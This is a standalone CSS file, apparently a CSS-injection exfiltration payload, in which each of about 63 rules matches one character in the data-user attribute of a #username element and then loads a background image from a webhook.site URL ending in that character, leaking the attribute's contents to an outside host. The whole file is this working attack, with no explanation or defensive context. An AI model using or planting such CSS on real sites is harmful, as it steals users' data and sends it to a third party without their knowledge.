#username[data-user*="0"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/0");}
#username[data-user*="1"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/1");}
#username[data-user*="2"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/2");}
#username[data-user*="3"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/3");}
#username[data-user*="4"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/4");}
#username[data-user*="5"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/5");}
#username[data-user*="6"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/6");}
#username[data-user*="7"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/7");}
#username[data-user*="8"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/8");}
#username[data-user*="9"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/9");}
#username[data-user*="a"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/a");}
#username[data-user*="b"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/b");}
#username[data-user*="c"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/c");}
#username[data-user*="d"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/d");}
#username[data-user*="e"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/e");}
#username[data-user*="f"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/f");}
#username[data-user*="g"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/g");}
#username[data-user*="h"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/h");}
#username[data-user*="i"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/i");}
#username[data-user*="j"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/j");}
#username[data-user*="k"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/k");}
#username[data-user*="l"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/l");}
#username[data-user*="m"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/m");}
#username[data-user*="n"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/n");}
#username[data-user*="o"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/o");}
#username[data-user*="p"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/p");}
#username[data-user*="q"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/q");}
#username[data-user*="r"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/r");}
#username[data-user*="s"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/s");}
#username[data-user*="t"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/t");}
#username[data-user*="u"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/u");}
#username[data-user*="v"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/v");}
#username[data-user*="w"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/w");}
#username[data-user*="x"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/x");}
#username[data-user*="y"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/y");}
#username[data-user*="z"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/z");}
#username[data-user*="A"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/A");}
#username[data-user*="B"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/B");}
#username[data-user*="C"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/C");}
#username[data-user*="D"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/D");}
#username[data-user*="E"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/E");}
#username[data-user*="F"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/F");}
#username[data-user*="G"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/G");}
#username[data-user*="H"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/H");}
#username[data-user*="I"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/I");}
#username[data-user*="J"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/J");}
#username[data-user*="K"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/K");}
#username[data-user*="L"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/L");}
#username[data-user*="M"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/M");}
#username[data-user*="N"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/N");}
#username[data-user*="O"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/O");}
#username[data-user*="P"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/P");}
#username[data-user*="Q"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/Q");}
#username[data-user*="R"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/R");}
#username[data-user*="S"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/S");}
#username[data-user*="T"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/T");}
#username[data-user*="U"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/U");}
#username[data-user*="V"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/V");}
#username[data-user*="W"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/W");}
#username[data-user*="X"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/X");}
#username[data-user*="Y"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/Y");}
#username[data-user*="Z"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/Z");}
#username[data-user*="!"]~#login{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/!");}